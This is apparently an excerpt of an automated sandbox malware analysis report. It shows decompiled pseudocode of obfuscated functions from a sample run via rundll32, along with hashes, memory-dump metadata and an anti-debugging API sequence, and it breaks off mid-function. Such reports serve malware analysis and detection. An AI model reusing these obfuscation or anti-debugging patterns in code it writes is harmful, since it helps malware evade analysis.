                                                                                                                      • Opcode Fuzzy Hash: 12f6af15288137ab8395320d4a41eeea58601aee8cec5df1abd2f05953039872
                                                                                                                      • Instruction Fuzzy Hash: E1C1EF725093419FC368CF25C58A94BFBF1FBC4708F008A1DF5A99A260D7B59A19CF86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E001770ED() {
                                                                                                                      				char _v520;
                                                                                                                      				signed int _v524;
                                                                                                                      				signed int _v528;
                                                                                                                      				signed int _v532;
                                                                                                                      				signed int _v536;
                                                                                                                      				signed int _v540;
                                                                                                                      				signed int _v544;
                                                                                                                      				signed int _v548;
                                                                                                                      				signed int _v552;
                                                                                                                      				signed int _v556;
                                                                                                                      				signed int _v560;
                                                                                                                      				signed int _v564;
                                                                                                                      				signed int _v568;
                                                                                                                      				signed int _v572;
                                                                                                                      				signed int _v576;
                                                                                                                      				signed int _v580;
                                                                                                                      				signed int _v584;
                                                                                                                      				signed int _v588;
                                                                                                                      				signed int _v592;
                                                                                                                      				signed int _v596;
                                                                                                                      				signed int _v600;
                                                                                                                      				signed int _v604;
                                                                                                                      				signed int _v608;
                                                                                                                      				signed int _v612;
                                                                                                                      				signed int _t202;
                                                                                                                      				signed int _t203;
                                                                                                                      				void* _t204;
                                                                                                                      				intOrPtr _t209;
                                                                                                                      				intOrPtr _t216;
                                                                                                                      				void* _t218;
                                                                                                                      				intOrPtr _t224;
                                                                                                                      				intOrPtr _t236;
                                                                                                                      				signed int _t241;
                                                                                                                      				signed int _t242;
                                                                                                                      				signed int _t243;
                                                                                                                      				signed int _t244;
                                                                                                                      				void* _t246;
                                                                                                                      				signed int* _t248;
                                                                                                                      				void* _t251;
                                                                                                                      
                                                                                                                      				_t248 =  &_v612;
                                                                                                                      				_v540 = 0xdad4cc;
                                                                                                                      				_v540 = _v540 ^ 0x94191629;
                                                                                                                      				_t218 = 0x6f2f9f8;
                                                                                                                      				_v540 = _v540 ^ 0x94c3c2f9;
                                                                                                                      				_v544 = 0x76e0f0;
                                                                                                                      				_v544 = _v544 << 0x10;
                                                                                                                      				_v544 = _v544 ^ 0xe0f00029;
                                                                                                                      				_v536 = 0x3bc67a;
                                                                                                                      				_v536 = _v536 >> 0xc;
                                                                                                                      				_v536 = _v536 ^ 0x000f0383;
                                                                                                                      				_v568 = 0x8bde3b;
                                                                                                                      				_v568 = _v568 + 0xffff2322;
                                                                                                                      				_v568 = _v568 ^ 0x008d993e;
                                                                                                                      				_v596 = 0x92619;
                                                                                                                      				_v596 = _v596 ^ 0xd159791b;
                                                                                                                      				_v596 = _v596 + 0xffff3449;
                                                                                                                      				_v596 = _v596 | 0x988058a4;
                                                                                                                      				_v596 = _v596 ^ 0xd9ccc0e1;
                                                                                                                      				_v608 = 0xa06713;
                                                                                                                      				_t241 = 0x29;
                                                                                                                      				_v608 = _v608 / _t241;
                                                                                                                      				_v608 = _v608 ^ 0x6a345d45;
                                                                                                                      				_t246 = 0;
                                                                                                                      				_v608 = _v608 << 0xe;
                                                                                                                      				_v608 = _v608 ^ 0xed3298df;
                                                                                                                      				_v576 = 0x1c835f;
                                                                                                                      				_v576 = _v576 ^ 0xdf607740;
                                                                                                                      				_v576 = _v576 >> 0xb;
                                                                                                                      				_v576 = _v576 ^ 0x0012ec93;
                                                                                                                      				_v584 = 0x7ddda5;
                                                                                                                      				_t242 = 0x76;
                                                                                                                      				_v584 = _v584 / _t242;
                                                                                                                      				_v584 = _v584 | 0x464a7126;
                                                                                                                      				_v584 = _v584 ^ 0x4642215f;
                                                                                                                      				_v548 = 0x20374d;
                                                                                                                      				_t243 = 0x71;
                                                                                                                      				_v548 = _v548 * 0x6c;
                                                                                                                      				_v548 = _v548 ^ 0x0d9d239d;
                                                                                                                      				_v528 = 0x9116;
                                                                                                                      				_v528 = _v528 ^ 0x0b2a50da;
                                                                                                                      				_v528 = _v528 ^ 0x0b2b7a92;
                                                                                                                      				_v600 = 0xee9b3a;
                                                                                                                      				_v600 = _v600 | 0x1ae7cac3;
                                                                                                                      				_v600 = _v600 + 0x2aec;
                                                                                                                      				_v600 = _v600 | 0xe5d5fb71;
                                                                                                                      				_v600 = _v600 ^ 0xfffe899a;
                                                                                                                      				_v556 = 0x2fd7b1;
                                                                                                                      				_v556 = _v556 / _t243;
                                                                                                                      				_v556 = _v556 ^ 0x0001ae08;
                                                                                                                      				_v552 = 0xd06bd7;
                                                                                                                      				_v552 = _v552 + 0x9aba;
                                                                                                                      				_v552 = _v552 ^ 0x00dba68b;
                                                                                                                      				_v560 = 0x3f6698;
                                                                                                                      				_v560 = _v560 ^ 0x9e976c20;
                                                                                                                      				_v560 = _v560 ^ 0x9ea088a0;
                                                                                                                      				_v564 = 0xf04caf;
                                                                                                                      				_v564 = _v564 << 0xc;
                                                                                                                      				_v564 = _v564 ^ 0x04c86801;
                                                                                                                      				_v532 = 0x4abe1e;
                                                                                                                      				_v532 = _v532 + 0xffff7e54;
                                                                                                                      				_v532 = _v532 ^ 0x0047677c;
                                                                                                                      				_v592 = 0xfc3d76;
                                                                                                                      				_v592 = _v592 >> 4;
                                                                                                                      				_t244 = 0x67;
                                                                                                                      				_t245 = _v524;
                                                                                                                      				_v592 = _v592 / _t244;
                                                                                                                      				_v592 = _v592 ^ 0x0e63bcd1;
                                                                                                                      				_v592 = _v592 ^ 0x0e6c0c0a;
                                                                                                                      				_v580 = 0x87074e;
                                                                                                                      				_v580 = _v580 + 0x3b8f;
                                                                                                                      				_v580 = _v580 + 0xffffa265;
                                                                                                                      				_v580 = _v580 ^ 0x008cb1a6;
                                                                                                                      				_v588 = 0xe717aa;
                                                                                                                      				_v588 = _v588 | 0xfff18f7b;
                                                                                                                      				_v588 = _v588 >> 0xb;
                                                                                                                      				_v588 = _v588 ^ 0x001226f1;
                                                                                                                      				_v604 = 0x61f630;
                                                                                                                      				_v604 = _v604 | 0xec5f2186;
                                                                                                                      				_v604 = _v604 ^ 0x97c62f9e;
                                                                                                                      				_v604 = _v604 ^ 0x80f94e8c;
                                                                                                                      				_v604 = _v604 ^ 0xfb4d53d4;
                                                                                                                      				_v612 = 0x890e92;
                                                                                                                      				_v612 = _v612 >> 9;
                                                                                                                      				_v612 = _v612 + 0xf9d4;
                                                                                                                      				_v612 = _v612 + 0xffff7e3c;
                                                                                                                      				_v612 = _v612 ^ 0x000167a4;
                                                                                                                      				_v572 = 0xa3f922;
                                                                                                                      				_v572 = _v572 << 1;
                                                                                                                      				_v572 = _v572 + 0x9b39;
                                                                                                                      				_v572 = _v572 ^ 0x014464a5;
                                                                                                                      				goto L1;
                                                                                                                      				do {
                                                                                                                      					while(1) {
                                                                                                                      						L1:
                                                                                                                      						_t251 = _t218 - 0xaf66d96;
                                                                                                                      						if(_t251 > 0) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						if(_t251 == 0) {
                                                                                                                      							_push(_t218);
                                                                                                                      							_t236 =  *0x19520c; // 0x0
                                                                                                                      							_t203 = E0017EA7B(_t236 + 8, _v552, _v524, _t218, _v560, _v564, _v532);
                                                                                                                      							_t248 =  &(_t248[7]);
                                                                                                                      							_t218 = 0xbcbad55;
                                                                                                                      							__eflags = _t203;
                                                                                                                      							_t204 = 1;
                                                                                                                      							_t246 =  ==  ? _t204 : _t246;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t218 == 0x1700698) {
                                                                                                                      							E0018E689(_v548, _v528, _v600, _t245, _v556);
                                                                                                                      							_t248 =  &(_t248[3]);
                                                                                                                      							L9:
                                                                                                                      							_t218 = 0xaf66d96;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t218 == 0x4f7449d) {
                                                                                                                      							_v524 = _v540;
                                                                                                                      							goto L9;
                                                                                                                      						}
                                                                                                                      						if(_t218 == 0x51416c3) {
                                                                                                                      							E001912A8(_t218, _v592, __eflags, _v580, _v588,  &_v520);
                                                                                                                      							_t209 = E00177677( &_v520, _v604, _v612, _v572);
                                                                                                                      							_t224 =  *0x19520c; // 0x0
                                                                                                                      							 *((intOrPtr*)(_t224 + 4)) = _t209;
                                                                                                                      							L23:
                                                                                                                      							return _t246;
                                                                                                                      						}
                                                                                                                      						if(_t218 != 0x6f2f9f8) {
                                                                                                                      							goto L20;
                                                                                                                      						}
                                                                                                                      						_push(_t218);
                                                                                                                      						_push(_t218);
                                                                                                                      						 *0x19520c = E00183512(0x444);
                                                                                                                      						_t218 = 0xcc58939;
                                                                                                                      					}
                                                                                                                      					__eflags = _t218 - 0xbcbad55;
                                                                                                                      					if(_t218 == 0xbcbad55) {
                                                                                                                      						E0017E86A();
                                                                                                                      						_t218 = 0x51416c3;
                                                                                                                      						goto L20;
                                                                                                                      					}
                                                                                                                      					__eflags = _t218 - 0xcc58939;
                                                                                                                      					if(_t218 == 0xcc58939) {
                                                                                                                      						_t202 = E0017EB36(_v576, _v584, _t218, _v536);
                                                                                                                      						_t245 = _t202;
                                                                                                                      						_t248 =  &(_t248[3]);
                                                                                                                      						__eflags = _t202;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							_t218 = 0x4f7449d;
                                                                                                                      						} else {
                                                                                                                      							_t216 =  *0x19520c; // 0x0
                                                                                                                      							 *((intOrPtr*)(_t216 + 0x438)) = 1;
                                                                                                                      							_t218 = 0xdbc7fda;
                                                                                                                      						}
                                                                                                                      						goto L1;
                                                                                                                      					}
                                                                                                                      					__eflags = _t218 - 0xdbc7fda;
                                                                                                                      					if(__eflags != 0) {
                                                                                                                      						goto L20;
                                                                                                                      					}
                                                                                                                      					_t218 = 0x1700698;
                                                                                                                      					_v524 = _v544;
                                                                                                                      					goto L1;
                                                                                                                      					L20:
                                                                                                                      					__eflags = _t218 - 0xee3620e;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L23;
                                                                                                                      			}

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )$E]4j$M7 $_!BF$|gG$*
                                                                                                                      • API String ID: 0-1206799572
                                                                                                                      • Opcode ID: 276c008d1d8b7a0b29edefbbbbca22cfdb987e9d832aeab62bf6dea0547d93f8
                                                                                                                      • Instruction ID: ced1676f5b9d662ba395e37c986903006056f23467e90848dcf60b3bd67e0b05
                                                                                                                      • Opcode Fuzzy Hash: 276c008d1d8b7a0b29edefbbbbca22cfdb987e9d832aeab62bf6dea0547d93f8
                                                                                                                      • Instruction Fuzzy Hash: 0BA1217150C3819FD768CF24D58A82BBBF2FBC5758F20891DF69A86260D3B18949CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 99%
                                                                                                                      			E00185040(void* __ecx, void* __edx) {
                                                                                                                      				signed int _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _t222;
                                                                                                                      				signed int _t224;
                                                                                                                      				void* _t227;
                                                                                                                      				signed int _t229;
                                                                                                                      				signed int _t230;
                                                                                                                      				signed int _t231;
                                                                                                                      				signed int _t232;
                                                                                                                      				signed int _t233;
                                                                                                                      				signed int _t234;
                                                                                                                      				signed int _t235;
                                                                                                                      				void* _t261;
                                                                                                                      				void* _t262;
                                                                                                                      				signed int* _t264;
                                                                                                                      				signed int* _t265;
                                                                                                                      
                                                                                                                      				_t264 =  &_v80;
                                                                                                                      				_v64 = 0xca2d1a;
                                                                                                                      				_v64 = _v64 + 0xffff463a;
                                                                                                                      				_v64 = _v64 + 0xffffa2b5;
                                                                                                                      				_v64 = _v64 + 0xffffe441;
                                                                                                                      				_v64 = _v64 ^ 0x00ce8887;
                                                                                                                      				_v68 = 0xe757b6;
                                                                                                                      				_t261 = __edx;
                                                                                                                      				_t227 = __ecx;
                                                                                                                      				_t262 = 0xd46e588;
                                                                                                                      				_t229 = 0x7b;
                                                                                                                      				_v68 = _v68 / _t229;
                                                                                                                      				_v68 = _v68 | 0x2f3c6c23;
                                                                                                                      				_v68 = _v68 << 5;
                                                                                                                      				_v68 = _v68 ^ 0xe7b70971;
                                                                                                                      				_v72 = 0xa66d67;
                                                                                                                      				_v72 = _v72 + 0xffff9e81;
                                                                                                                      				_v72 = _v72 + 0xffffa01d;
                                                                                                                      				_v72 = _v72 + 0xd858;
                                                                                                                      				_v72 = _v72 ^ 0x00aeb203;
                                                                                                                      				_v76 = 0xda65d9;
                                                                                                                      				_v76 = _v76 | 0x06c15440;
                                                                                                                      				_v76 = _v76 + 0x3ac0;
                                                                                                                      				_t230 = 0x31;
                                                                                                                      				_v76 = _v76 * 0x17;
                                                                                                                      				_v76 = _v76 ^ 0x9dbea6d5;
                                                                                                                      				_v28 = 0xef7021;
                                                                                                                      				_v28 = _v28 + 0xc1df;
                                                                                                                      				_v28 = _v28 ^ 0x38dac4ec;
                                                                                                                      				_v28 = _v28 ^ 0x38291ca9;
                                                                                                                      				_v56 = 0xd77e5;
                                                                                                                      				_v56 = _v56 | 0x9f6ff94e;
                                                                                                                      				_v56 = _v56 / _t230;
                                                                                                                      				_v56 = _v56 ^ 0x034debba;
                                                                                                                      				_v32 = 0x5c0433;
                                                                                                                      				_t231 = 0x4c;
                                                                                                                      				_v32 = _v32 / _t231;
                                                                                                                      				_t232 = 0x38;
                                                                                                                      				_v32 = _v32 * 9;
                                                                                                                      				_v32 = _v32 ^ 0x000ec3b0;
                                                                                                                      				_v60 = 0x6ca766;
                                                                                                                      				_v60 = _v60 + 0x1f13;
                                                                                                                      				_v60 = _v60 * 0x1b;
                                                                                                                      				_v60 = _v60 << 0xb;
                                                                                                                      				_v60 = _v60 ^ 0xc778512f;
                                                                                                                      				_v12 = 0x6aa94;
                                                                                                                      				_v12 = _v12 + 0x5212;
                                                                                                                      				_v12 = _v12 ^ 0x000734b5;
                                                                                                                      				_v48 = 0xd6268c;
                                                                                                                      				_v48 = _v48 / _t232;
                                                                                                                      				_t233 = 0x26;
                                                                                                                      				_v48 = _v48 / _t233;
                                                                                                                      				_v48 = _v48 + 0x646;
                                                                                                                      				_v48 = _v48 ^ 0x000e3e3b;
                                                                                                                      				_v52 = 0x57df31;
                                                                                                                      				_t234 = 0x5e;
                                                                                                                      				_v52 = _v52 / _t234;
                                                                                                                      				_v52 = _v52 >> 4;
                                                                                                                      				_v52 = _v52 << 0x10;
                                                                                                                      				_v52 = _v52 ^ 0x0ef79a5c;
                                                                                                                      				_v8 = 0x5569b0;
                                                                                                                      				_v8 = _v8 >> 0xd;
                                                                                                                      				_v8 = _v8 ^ 0x000ef288;
                                                                                                                      				_v44 = 0x5fa9ce;
                                                                                                                      				_v44 = _v44 + 0xffff7bdd;
                                                                                                                      				_v44 = _v44 << 1;
                                                                                                                      				_t235 = 0x65;
                                                                                                                      				_v44 = _v44 / _t235;
                                                                                                                      				_v44 = _v44 ^ 0x000c777c;
                                                                                                                      				_v36 = 0x515ebf;
                                                                                                                      				_v36 = _v36 | 0x64797e59;
                                                                                                                      				_v36 = _v36 ^ 0x4915d5d4;
                                                                                                                      				_v36 = _v36 ^ 0x2d62d183;
                                                                                                                      				_v16 = 0xf90c33;
                                                                                                                      				_v16 = _v16 * 0x1d;
                                                                                                                      				_v16 = _v16 ^ 0x1c3bb4ce;
                                                                                                                      				_v80 = 0x303e6a;
                                                                                                                      				_v80 = _v80 + 0xaf21;
                                                                                                                      				_v80 = _v80 ^ 0x45872c25;
                                                                                                                      				_v80 = _v80 + 0xffff3867;
                                                                                                                      				_v80 = _v80 ^ 0x45bdee21;
                                                                                                                      				_v20 = 0xb8b4ba;
                                                                                                                      				_v20 = _v20 + 0x3a99;
                                                                                                                      				_v20 = _v20 ^ 0x00b083c3;
                                                                                                                      				_v40 = 0xb582c8;
                                                                                                                      				_v40 = _v40 + 0x432d;
                                                                                                                      				_v40 = _v40 | 0xfff7ef9a;
                                                                                                                      				_v40 = _v40 ^ 0xfff9a351;
                                                                                                                      				_v24 = 0x3e85d;
                                                                                                                      				_v24 = _v24 * 0x1b;
                                                                                                                      				_v24 = _v24 + 0xffffd227;
                                                                                                                      				_v24 = _v24 ^ 0x006c1bcc;
                                                                                                                      				_v4 = 0x28c504;
                                                                                                                      				_v4 = _v4 + 0xffffee75;
                                                                                                                      				_v4 = _v4 ^ 0x002a9648;
                                                                                                                      				do {
                                                                                                                      					while(_t262 != 0x8d90b87) {
                                                                                                                      						if(_t262 == 0x991fac7) {
                                                                                                                      							return E0017F88A(_v40, _v24, _v4,  *(_t261 + 0x30));
                                                                                                                      						}
                                                                                                                      						if(_t262 == 0xa3f1429) {
                                                                                                                      							_push(_t235);
                                                                                                                      							_t224 = E00188D71(_v64, _v68, __eflags, _v72, _v76, _t227);
                                                                                                                      							_t265 =  &(_t264[4]);
                                                                                                                      							 *(_t261 + 0x30) = _t224;
                                                                                                                      							__eflags = _t224;
                                                                                                                      							if(_t224 != 0) {
                                                                                                                      								E0017EE05(_v56, _v32, _v60, _t224, _t224);
                                                                                                                      								_t235 =  *(_t261 + 0x30);
                                                                                                                      								E0018E713(_t235, _v12, _v48, _v52);
                                                                                                                      								_t264 =  &(_t265[6]);
                                                                                                                      								_t262 = 0x8d90b87;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							if(_t262 == 0xd46e588) {
                                                                                                                      								_t262 = 0xa3f1429;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t262 != 0xf9322b8) {
                                                                                                                      									goto L14;
                                                                                                                      								} else {
                                                                                                                      									_t235 = E00172F34;
                                                                                                                      									_t224 = E00184EFF(E00172F34, _v36, E00172F34, E00172F34, _v16, _v80, E00172F34, _v20, _t261);
                                                                                                                      									_t264 =  &(_t264[8]);
                                                                                                                      									 *(_t261 + 0x24) = _t224;
                                                                                                                      									if(_t224 == 0) {
                                                                                                                      										_t262 = 0x991fac7;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						return _t224;
                                                                                                                      						L18:
                                                                                                                      					}
                                                                                                                      					_t235 = _v8;
                                                                                                                      					_t222 = E00182BDE(_t235,  *(_t261 + 0x30), _v44);
                                                                                                                      					_t264 =  &(_t264[1]);
                                                                                                                      					 *(_t261 + 0xc) = _t222;
                                                                                                                      					__eflags = _t222;
                                                                                                                      					if(__eflags == 0) {
                                                                                                                      						_t262 = 0x991fac7;
                                                                                                                      						goto L14;
                                                                                                                      					} else {
                                                                                                                      						_t262 = 0xf9322b8;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L18;
                                                                                                                      					L14:
                                                                                                                      					__eflags = _t262 - 0x74fce14;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				return _t224;
                                                                                                                      			}





































                                                                                                                      0x001852b7
                                                                                                                      0x001852bf
                                                                                                                      0x001852c7
                                                                                                                      0x001852cf
                                                                                                                      0x001852d7
                                                                                                                      0x001852df
                                                                                                                      0x001852ec
                                                                                                                      0x001852f0
                                                                                                                      0x001852f8
                                                                                                                      0x00185300
                                                                                                                      0x00185308
                                                                                                                      0x00185310
                                                                                                                      0x00185318
                                                                                                                      0x00185318
                                                                                                                      0x00185326
                                                                                                                      0x00000000
                                                                                                                      0x00185425
                                                                                                                      0x00185332
                                                                                                                      0x0018537f
                                                                                                                      0x00185391
                                                                                                                      0x00185396
                                                                                                                      0x00185399
                                                                                                                      0x0018539c
                                                                                                                      0x0018539e
                                                                                                                      0x001853b6
                                                                                                                      0x001853c7
                                                                                                                      0x001853ca
                                                                                                                      0x001853cf
                                                                                                                      0x001853d2
                                                                                                                      0x00000000
                                                                                                                      0x001853d2
                                                                                                                      0x00185334
                                                                                                                      0x0018533a
                                                                                                                      0x00185378
                                                                                                                      0x00000000
                                                                                                                      0x0018533c
                                                                                                                      0x00185342
                                                                                                                      0x00000000
                                                                                                                      0x00185348
                                                                                                                      0x0018535c
                                                                                                                      0x00185361
                                                                                                                      0x00185366
                                                                                                                      0x00185369
                                                                                                                      0x0018536e
                                                                                                                      0x00185374
                                                                                                                      0x00000000
                                                                                                                      0x00185374
                                                                                                                      0x0018536e
                                                                                                                      0x00185342
                                                                                                                      0x0018533a
                                                                                                                      0x0018542d
                                                                                                                      0x00000000
                                                                                                                      0x0018542d
                                                                                                                      0x001853e3
                                                                                                                      0x001853e7
                                                                                                                      0x001853ec
                                                                                                                      0x001853ef
                                                                                                                      0x001853f2
                                                                                                                      0x001853f4
                                                                                                                      0x00185400
                                                                                                                      0x00000000
                                                                                                                      0x001853f6
                                                                                                                      0x001853f6
                                                                                                                      0x00000000
                                                                                                                      0x001853f6
                                                                                                                      0x00000000
                                                                                                                      0x00185402
                                                                                                                      0x00185402
                                                                                                                      0x00185402
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !p$#l</$-C$Y~yd$j>0$w
                                                                                                                      • API String ID: 0-1896768906
                                                                                                                      • Opcode ID: fa5727b88ca72abd79281b54500e12f094f20970752ecc2ef75d14e4d2ff21ce
                                                                                                                      • Instruction ID: eaa040d4e2dda195f0d3f73e29893f4272208e8e86f14c666fc0a3d24910c464
                                                                                                                      • Opcode Fuzzy Hash: fa5727b88ca72abd79281b54500e12f094f20970752ecc2ef75d14e4d2ff21ce
                                                                                                                      • Instruction Fuzzy Hash: DDA16471908741AFD358DF24C48941BFBF2FBC4398F409A1DF59696260E7B58A498F83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 100357B5
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 100357CA
                                                                                                                      • UnhandledExceptionFilter.KERNEL32(10049C70), ref: 100357D5
                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 100357F1
                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 100357F8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2579439406-0
                                                                                                                      • Opcode ID: a3b530651e130d006cdad9593b6537dae4cc17848e5dd1109e30e69b3ede4491
                                                                                                                      • Instruction ID: 507c20c1e61512489ef28f25289f4d37d9bc9ee57db3d69d2177bc050be51aa9
                                                                                                                      • Opcode Fuzzy Hash: a3b530651e130d006cdad9593b6537dae4cc17848e5dd1109e30e69b3ede4491
                                                                                                                      • Instruction Fuzzy Hash: 3D21FFB4801320CFFB11DF28EDC56483BA4FB88315F10206AE50D87A71EBB16680AF56
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E00182BF6() {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				char _v1560;
                                                                                                                      				void* _v1572;
                                                                                                                      				intOrPtr _v1576;
                                                                                                                      				signed int _v1580;
                                                                                                                      				signed int _v1584;
                                                                                                                      				signed int _v1588;
                                                                                                                      				signed int _v1592;
                                                                                                                      				signed int _v1596;
                                                                                                                      				signed int _v1600;
                                                                                                                      				signed int _v1604;
                                                                                                                      				signed int _v1608;
                                                                                                                      				signed int _v1612;
                                                                                                                      				signed int _v1616;
                                                                                                                      				signed int _v1620;
                                                                                                                      				signed int _v1624;
                                                                                                                      				signed int _v1628;
                                                                                                                      				signed int _v1632;
                                                                                                                      				signed int _v1636;
                                                                                                                      				signed int _v1640;
                                                                                                                      				signed int _v1644;
                                                                                                                      				signed int _v1648;
                                                                                                                      				signed int _v1652;
                                                                                                                      				signed int _v1656;
                                                                                                                      				signed int _v1660;
                                                                                                                      				signed int _v1664;
                                                                                                                      				signed int _v1668;
                                                                                                                      				signed int _v1672;
                                                                                                                      				signed int _v1676;
                                                                                                                      				signed int _v1680;
                                                                                                                      				signed int _v1684;
                                                                                                                      				signed int _v1688;
                                                                                                                      				signed int _v1692;
                                                                                                                      				signed int _v1696;
                                                                                                                      				signed int _v1700;
                                                                                                                      				signed int _v1704;
                                                                                                                      				signed int _v1708;
                                                                                                                      				signed int _v1712;
                                                                                                                      				signed int _v1716;
                                                                                                                      				signed int _v1720;
                                                                                                                      				signed int _v1724;
                                                                                                                      				signed int _v1728;
                                                                                                                      				signed int _v1732;
                                                                                                                      				signed int _v1736;
                                                                                                                      				signed int _v1740;
                                                                                                                      				signed int _v1744;
                                                                                                                      				signed int _v1748;
                                                                                                                      				signed int _v1752;
                                                                                                                      				signed int _v1756;
                                                                                                                      				signed int _v1760;
                                                                                                                      				void* _t442;
                                                                                                                      				intOrPtr _t446;
                                                                                                                      				intOrPtr _t448;
                                                                                                                      				signed int _t458;
                                                                                                                      				signed int _t460;
                                                                                                                      				void* _t461;
                                                                                                                      				void* _t492;
                                                                                                                      				signed int _t502;
                                                                                                                      				intOrPtr _t503;
                                                                                                                      				intOrPtr* _t504;
                                                                                                                      				signed int _t505;
                                                                                                                      				signed int _t506;
                                                                                                                      				signed int _t507;
                                                                                                                      				signed int _t508;
                                                                                                                      				signed int _t509;
                                                                                                                      				signed int _t510;
                                                                                                                      				signed int _t511;
                                                                                                                      				signed int _t512;
                                                                                                                      				signed int _t513;
                                                                                                                      				signed int _t514;
                                                                                                                      				void* _t515;
                                                                                                                      				signed int* _t518;
                                                                                                                      				void* _t521;
                                                                                                                      
                                                                                                                      				_t518 =  &_v1760;
                                                                                                                      				_v1576 = 0xf21b90;
                                                                                                                      				_v1596 = _v1596 & 0x00000000;
                                                                                                                      				asm("stosd");
                                                                                                                      				_t505 = 0x2b;
                                                                                                                      				asm("stosd");
                                                                                                                      				_t461 = 0x34076d8;
                                                                                                                      				asm("stosd");
                                                                                                                      				_v1580 = 0xbaeef6;
                                                                                                                      				_v1580 = _v1580 + 0xba3c;
                                                                                                                      				_v1580 = _v1580 ^ 0x00bba91b;
                                                                                                                      				_v1660 = 0x2ae6d5;
                                                                                                                      				_v1660 = _v1660 << 6;
                                                                                                                      				_v1660 = _v1660 / _t505;
                                                                                                                      				_v1660 = _v1660 ^ 0x0030dab5;
                                                                                                                      				_v1716 = 0xb009df;
                                                                                                                      				_v1716 = _v1716 ^ 0xf6c25862;
                                                                                                                      				_v1716 = _v1716 + 0xcd46;
                                                                                                                      				_v1716 = _v1716 + 0x716d;
                                                                                                                      				_v1716 = _v1716 ^ 0xf6739072;
                                                                                                                      				_v1588 = 0x61188e;
                                                                                                                      				_v1588 = _v1588 ^ 0xbe54106a;
                                                                                                                      				_v1588 = _v1588 ^ 0xbe3508e6;
                                                                                                                      				_v1600 = 0x5c78c8;
                                                                                                                      				_v1600 = _v1600 | 0xa4208796;
                                                                                                                      				_v1600 = _v1600 ^ 0xa47cffde;
                                                                                                                      				_v1684 = 0xfd831d;
                                                                                                                      				_v1684 = _v1684 << 5;
                                                                                                                      				_v1684 = _v1684 >> 0xc;
                                                                                                                      				_v1684 = _v1684 ^ 0x0001fb16;
                                                                                                                      				_v1608 = 0x3a7886;
                                                                                                                      				_v1608 = _v1608 + 0xffff806f;
                                                                                                                      				_v1608 = _v1608 ^ 0x003b1c87;
